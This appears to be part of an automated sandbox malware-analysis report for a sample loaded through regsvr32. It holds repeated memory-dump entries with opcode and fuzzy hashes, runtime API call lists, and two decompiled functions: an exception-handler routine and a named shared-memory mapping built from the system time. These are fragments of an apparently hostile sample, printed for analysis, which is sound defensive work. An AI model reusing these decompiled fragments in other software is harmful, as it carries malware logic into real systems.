                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                    • Instruction ID: 68110f3cfda3d9ec573c5304ab66e4545c8fe51064d6d3238ea51483b03845d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DD17173D0A6B3568F76852E446813EEEE27FC1B9071EC7E19CD47F289D126AD00A6D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                    • Instruction ID: ae683bb6f3a4317a9d8e2c55847de4f55d67e2b47d4524fada0067c9aee91418
                                                                                                                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: BCD19173D0AAB35A8F36852E405417EEAE27FC1B9071ECBE1DCD47F289D126AD1096D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                    • Instruction ID: 288ea5e4e0d6f80c5558716ca41783925c657f8b3f1fee8c4c569806ac3bb83b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: B3C17E73D0AAB34A9F36852E405817EEAE27FC1B9171FC7E18CD46F289D636AC0495D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                    • Instruction ID: 4e2c9cec36453eeb1ab52f5ba5c4f5ad76d76d7644575d1a4535d2328fcd2e43
                                                                                                                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4EC17273D0AAB34A9F36852E405817FEAE27FC1B8171EC3E18CD46F289D236AD0595D0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 90dc66cdfd41e69948f85542dcf65e487fbd280e61ff67dc2c7f31549b3ad679
                                                                                                                                                                                    • Instruction ID: 38e0650aab39f78bae653ca254825e98ee91cec69b1c0be2e53259be25eb0ce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90dc66cdfd41e69948f85542dcf65e487fbd280e61ff67dc2c7f31549b3ad679
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F12471B00054CBD358EF7AE4B1A697BBAE78830470985AAD44E9F3C5D63CAD48CF60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6fcc1ea49960309a3f7d89badbc5f5a886f75740285f7379595ec14f633c50ed
                                                                                                                                                                                    • Instruction ID: 6772df6a1936797644a9c1b5b56bbbddb05419d804e25ac9ad6920642328a66a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6fcc1ea49960309a3f7d89badbc5f5a886f75740285f7379595ec14f633c50ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C31E125B1104346DF7CF83CCD447F696D2F3147A0FF8A13EAC8682D98E515B8838A86
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                    			E04D72264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                    					E04D723CB(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                    					_t49 = E04D72485(_t66);
                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                    								L8:
                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                    								continue;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                    									} else {
                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                    										E04D72370(_t55, _t66);
                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                    										E04D723CB(_t89, _t66, 0);
                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                    										E04D72467(_t82[2]);
                                                                                                                                                                                    										 *(_t66 + 0xc) =  *_t82;
                                                                                                                                                                                    										_t66 = 0;
                                                                                                                                                                                    										_t86 = 0;
                                                                                                                                                                                    										 *(_t82[2])(1);
                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                    									}
                                                                                                                                                                                    								}
                                                                                                                                                                                    							}
                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						L11:
                                                                                                                                                                                    						_t46 = 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L13:
                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                    			}























                                                                                                                                                                                    0x04d72268
                                                                                                                                                                                    0x04d72269
                                                                                                                                                                                    0x04d7226a
                                                                                                                                                                                    0x04d7226d
                                                                                                                                                                                    0x04d7226f
                                                                                                                                                                                    0x04d72272
                                                                                                                                                                                    0x04d72273
                                                                                                                                                                                    0x04d72275
                                                                                                                                                                                    0x04d72276
                                                                                                                                                                                    0x04d72277
                                                                                                                                                                                    0x04d7227a
                                                                                                                                                                                    0x04d72284
                                                                                                                                                                                    0x04d72335
                                                                                                                                                                                    0x04d7233c
                                                                                                                                                                                    0x04d72345
                                                                                                                                                                                    0x04d7228a
                                                                                                                                                                                    0x04d7228a
                                                                                                                                                                                    0x04d72290
                                                                                                                                                                                    0x04d72296
                                                                                                                                                                                    0x04d72299
                                                                                                                                                                                    0x04d7229c
                                                                                                                                                                                    0x04d722a0
                                                                                                                                                                                    0x04d722a5
                                                                                                                                                                                    0x04d722aa
                                                                                                                                                                                    0x04d7232a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d722ac
                                                                                                                                                                                    0x04d722ac
                                                                                                                                                                                    0x04d722b8
                                                                                                                                                                                    0x04d722ba
                                                                                                                                                                                    0x04d72315
                                                                                                                                                                                    0x04d72315
                                                                                                                                                                                    0x04d7231b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d722bc
                                                                                                                                                                                    0x04d722cb
                                                                                                                                                                                    0x04d722cd
                                                                                                                                                                                    0x04d722ce
                                                                                                                                                                                    0x04d722cf
                                                                                                                                                                                    0x04d722d2
                                                                                                                                                                                    0x04d722d2
                                                                                                                                                                                    0x04d722d4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d722d6
                                                                                                                                                                                    0x04d722d6
                                                                                                                                                                                    0x04d72320
                                                                                                                                                                                    0x04d722d8
                                                                                                                                                                                    0x04d722d8
                                                                                                                                                                                    0x04d722dc
                                                                                                                                                                                    0x04d722e4
                                                                                                                                                                                    0x04d722e9
                                                                                                                                                                                    0x04d722ee
                                                                                                                                                                                    0x04d722fa
                                                                                                                                                                                    0x04d72302
                                                                                                                                                                                    0x04d72309
                                                                                                                                                                                    0x04d7230f
                                                                                                                                                                                    0x04d72313
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d72313
                                                                                                                                                                                    0x04d722d6
                                                                                                                                                                                    0x04d722d4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d722ba
                                                                                                                                                                                    0x04d7232e
                                                                                                                                                                                    0x04d7232e
                                                                                                                                                                                    0x04d7232e
                                                                                                                                                                                    0x04d722aa
                                                                                                                                                                                    0x04d7234a
                                                                                                                                                                                    0x04d72351

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477268692.0000000004D71000.00000020.00020000.sdmp, Offset: 04D70000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.477251556.0000000004D70000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477283650.0000000004D73000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477296193.0000000004D75000.00000004.00020000.sdmp Download File
                                                                                                                                                                                    • Associated: 0000000A.00000002.477312335.0000000004D76000.00000002.00020000.sdmp Download File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d70000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                    • Instruction ID: f08e292baaf744854f2a856aeab72bdbbf506bba70a833b78e1ea64fa5d49d70
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0621B632A002449FDB10DF68C8C08ABBBA5FF49354B4581ADD9559B245E730FA15C7E1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477466799.0000000004DE2000.00000040.00020000.sdmp, Offset: 04DE2000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4de2000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                    • Instruction ID: e34571464747cbd15b1618f98a9dcbd140333ff8a9b14f11bba09e4ea9f3ee07
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A1193733401019FD754DE5ADC81EA2B3EEFB89334B2980AAED04CB311E676E841C760
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477466799.0000000004DE2000.00000040.00020000.sdmp, Offset: 04DE2000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4de2000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                    • Instruction ID: 8bf0aff8155bd10d13631c88bd530eb3350e582e2847a47b1fd2f9364f7f57ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                                                                                                                                                                    • Instruction Fuzzy Hash: E70192363052408FD715DB2ADA98D79B7E8FBC5730B2980BED547C7A15E224F845C620
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Name::operator+$Decorator::getoperator+$DataNameName::Name::operator+=Type$BasicDimensionName::operator=Primary
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 943562707-0
                                                                                                                                                                                    • Opcode ID: cc1f283cad272e76a9b27b2dce1cbca1cbb7b0c03c6f9233b8d6a23781bf895d
                                                                                                                                                                                    • Instruction ID: 9457002bb55f87d1e99d3712b4b1d23a89bd3a63b88099d47cc804e360168dca
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc1f283cad272e76a9b27b2dce1cbca1cbb7b0c03c6f9233b8d6a23781bf895d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E2413172B10209AAEF15FAA0CC45FEE77EDEF46A14F00052AF502E7180EA74FA449761
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D853C6
                                                                                                                                                                                      • Part of subcall function 04D8B5A1: __calloc_impl.LIBCMT ref: 04D8B5AF
                                                                                                                                                                                      • Part of subcall function 04D8B5A1: Sleep.KERNEL32(00000000,04D8AFC8,00000001,00000214), ref: 04D8B5C6
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D853E9
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D85405
                                                                                                                                                                                    • __copytlocinfo_nolock.LIBCMT ref: 04D8542A
                                                                                                                                                                                    • __setlocale_nolock.LIBCMT ref: 04D85439
                                                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 04D85445
                                                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 04D8544C
                                                                                                                                                                                    • __setmbcp_nolock.LIBCMT ref: 04D85464
                                                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 04D85479
                                                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 04D85480
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2969281212-0
                                                                                                                                                                                    • Opcode ID: 77a5e39aa690444f9ac9e59935713e3fb2cf7be290f81dc5801e62c4130dfdfd
                                                                                                                                                                                    • Instruction ID: fea5180918018e8bba757f65245d90dd390fc297f7fecad8375ce4943f0c3de7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a5e39aa690444f9ac9e59935713e3fb2cf7be290f81dc5801e62c4130dfdfd
                                                                                                                                                                                    • Instruction Fuzzy Hash: BF215335308211FEFB217F65F821A3ABBE5EF81759B10841DE48596160FB72B8109A65
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(00000001,04DA4288,00000001,?,00000100,?,?,?,?,?,04D92BFE,?,?,?,?,?), ref: 04D92A45
                                                                                                                                                                                    • GetLastError.KERNEL32(?,04D92BFE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D92A57
                                                                                                                                                                                    • _malloc.LIBCMT ref: 04D92AF1
                                                                                                                                                                                    • _memset.LIBCMT ref: 04D92B11
                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04D92B34
                                                                                                                                                                                    • __freea.LIBCMT ref: 04D92B3E
                                                                                                                                                                                    • ___ansicp.LIBCMT ref: 04D92B68
                                                                                                                                                                                    • ___convertcp.LIBCMT ref: 04D92B89
                                                                                                                                                                                      • Part of subcall function 04D9DAAB: _strlen.LIBCMT ref: 04D9DB2B
                                                                                                                                                                                      • Part of subcall function 04D9DAAB: _memset.LIBCMT ref: 04D9DBA3
                                                                                                                                                                                      • Part of subcall function 04D9DAAB: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,04D92BFE), ref: 04D9DBD5
                                                                                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,00000100,?,?,?,?,?,04D92BFE,?,?,?,?), ref: 04D92BA9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: StringType$_memset$ByteCharErrorLastMultiWide___ansicp___convertcp__freea_malloc_strlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3363058749-0
                                                                                                                                                                                    • Opcode ID: 640fbfc7da42faefa93bcab8ede5cf0ada7fda71223f6190b8808ee1b2a233d9
                                                                                                                                                                                    • Instruction ID: f6806e8b91f9fee806fbc30c8112b529ad5829635715f3f168755a96f5d2163f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 640fbfc7da42faefa93bcab8ede5cf0ada7fda71223f6190b8808ee1b2a233d9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6851BC7260020ABFDF209F65DC85DAE3BE9FB08358B1049A9F918D7254D734ED60CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 04D854FB
                                                                                                                                                                                    • __lock.LIBCMT ref: 04D85511
                                                                                                                                                                                    • __copytlocinfo_nolock.LIBCMT ref: 04D85523
                                                                                                                                                                                    • __setlocale_nolock.LIBCMT ref: 04D85538
                                                                                                                                                                                    • __lock.LIBCMT ref: 04D8556D
                                                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 04D85585
                                                                                                                                                                                    • _sync_legacy_variables_lk.LIBCMT ref: 04D855BE
                                                                                                                                                                                      • Part of subcall function 04D85B1F: __getptd_noexit.LIBCMT ref: 04D85B1F
                                                                                                                                                                                      • Part of subcall function 04D85AA7: __decode_pointer.LIBCMT ref: 04D85AB0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.477344093.0000000004D7F000.00000020.00020000.sdmp, Offset: 04D7F000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_4d7f000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __lock$___removelocaleref__calloc_crt__copytlocinfo_nolock__decode_pointer__getptd_noexit__setlocale_nolock_sync_legacy_variables_lk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1358582686-0
                                                                                                                                                                                    • Opcode ID: 3ff037472132351e5167a3da6c130c74f7e49a2fb5d79f1d9262cf324f94afbb
                                                                                                                                                                                    • Instruction ID: b351c099f587786533f2ac5cf9d8f3cd29ea807c4c5e0c7c913c1d1b27865318
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ff037472132351e5167a3da6c130c74f7e49a2fb5d79f1d9262cf324f94afbb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C31C171B00305BBFB10FFA4A8957BC37A1EF41328F10445EE4056B281DBB4BA419B75
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                    			E04D71979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                    				struct _FILETIME* _v16;
                                                                                                                                                                                    				short _v60;
                                                                                                                                                                                    				struct _FILETIME* _t14;
                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                    				long _t32;
                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t31 = __edx;
                                                                                                                                                                                    				_t14 =  &_v16;
                                                                                                                                                                                    				GetSystemTimeAsFileTime(_t14);
                                                                                                                                                                                    				_push(0x192);
                                                                                                                                                                                    				_push(0x54d38000);
                                                                                                                                                                                    				_push(_v12);
                                                                                                                                                                                    				_push(_v16);
                                                                                                                                                                                    				L04D72210();
                                                                                                                                                                                    				_push(_t14);
                                                                                                                                                                                    				_v16 = _t14;
                                                                                                                                                                                    				_t15 =  *0x4d741d0;
                                                                                                                                                                                    				_push(_t15 + 0x4d7505e);
                                                                                                                                                                                    				_push(_t15 + 0x4d75054);
                                                                                                                                                                                    				_push(0x16);
                                                                                                                                                                                    				_push( &_v60);
                                                                                                                                                                                    				_v12 = _t31;
                                                                                                                                                                                    				L04D7220A();
                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                    				if(_t18 == 0) {
                                                                                                                                                                                    					_t18 = 0x1000;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t34 = CreateFileMappingW(0xffffffff, 0x4d741c0, 4, 0, _t18,  &_v60);
                                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                                    					_t32 = GetLastError();
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                                                                                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                    							_t32 = GetLastError();
                                                                                                                                                                                    							if(_t32 != 0) {
                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							 *_a8 = _t34;
                                                                                                                                                                                    							 *_a12 = _t22;
                                                                                                                                                                                    							_t32 = 0;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						_t32 = 2;
                                                                                                                                                                                    						L9:
                                                                                                                                                                                    						CloseHandle(_t34);
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _t32;
                                                                                                                                                                                    			}













                                                                                                                                                                                    0x04d71979
                                                                                                                                                                                    0x04d71982
                                                                                                                                                                                    0x04d71986
                                                                                                                                                                                    0x04d7198c
                                                                                                                                                                                    0x04d71991
                                                                                                                                                                                    0x04d71996
                                                                                                                                                                                    0x04d71999
                                                                                                                                                                                    0x04d7199c
                                                                                                                                                                                    0x04d719a1
                                                                                                                                                                                    0x04d719a2
                                                                                                                                                                                    0x04d719a5
                                                                                                                                                                                    0x04d719b0
                                                                                                                                                                                    0x04d719b7
                                                                                                                                                                                    0x04d719bb
                                                                                                                                                                                    0x04d719bd
                                                                                                                                                                                    0x04d719be
                                                                                                                                                                                    0x04d719c1
                                                                                                                                                                                    0x04d719c6
                                                                                                                                                                                    0x04d719d0
                                                                                                                                                                                    0x04d719d2
                                                                                                                                                                                    0x04d719d2
                                                                                                                                                                                    0x04d719ec
                                                                                                                                                                                    0x04d719f0
                                                                                                                                                                                    0x04d71a40
                                                                                                                                                                                    0x04d719f2
                                                                                                                                                                                    0x04d719fb
                                                                                                                                                                                    0x04d71a11
                                                                                                                                                                                    0x04d71a19
                                                                                                                                                                                    0x04d71a2b
                                                                                                                                                                                    0x04d71a2f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x04d71a1b
                                                                                                                                                                                    0x04d71a1e
                                                                                                                                                                                    0x04d71a23
                                                                                                                                                                                    0x04d71a25
                                                                                                                                                                                    0x04d71a25
                                                                                                                                                                                    0x04d71a06
                                                                                                                                                                                    0x04d71a08
                                                                                                                                                                                    0x04d71a31
                                                                                                                                                                                    0x04d71a32
